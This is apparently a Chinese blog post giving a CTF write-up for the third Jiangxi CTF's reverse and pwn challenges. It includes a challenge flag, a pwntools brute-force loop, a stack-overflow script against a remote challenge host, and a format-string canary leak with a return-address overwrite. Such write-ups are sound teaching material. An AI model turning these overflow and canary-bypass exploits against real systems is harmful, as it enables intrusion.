Press "Enter" to skip to content

第三届江西CTF reverse pwn writeup

145 次浏览

Reverse-Babyre

拖入IDA查看查看字符串

CMISCCTF{Hello_CTF_Player_this_is_singin2}

Reverse-Crackme

爆破一下

from pwn import *
import re

for i in range(500):
    p=process("./crackme")
    p.sendlineafter('Hey give username\n','admin')
    p.sendlineafter('Give pass:\n','password')
    s=p.recv(50)
    b=re.findall('^CMISCCTF(.*?)',s)
    print s
    if b:
        print s
        break

pwn_cmcc_stack

from pwn import *



for i in range(200):
    #p=process("./bin")
    p=remote("118.26.128.67",11525)
    payload=p32(0xdeadbeef)*i
    p.sendline(payload)
    p.interactive()

pwn_pwn_canary

通过gdb调试可以发现canary距离EIP位12字节

from pwn import *


#p=process('./canary')
p=remote('118.26.128.67','31982')
e=ELF('./canary')
p.sendline("%7$x")
canary=int(p.recv(8),16)
#gdb.attach(p,"b * 0x804837a")
payload=p32(e.sym['getflag'])*25+p32(canary)+'B'*12+p32(e.sym['getflag'])
p.sendline(payload)
p.interactive()
发表评论

电子邮件地址不会被公开。 必填项已用*标注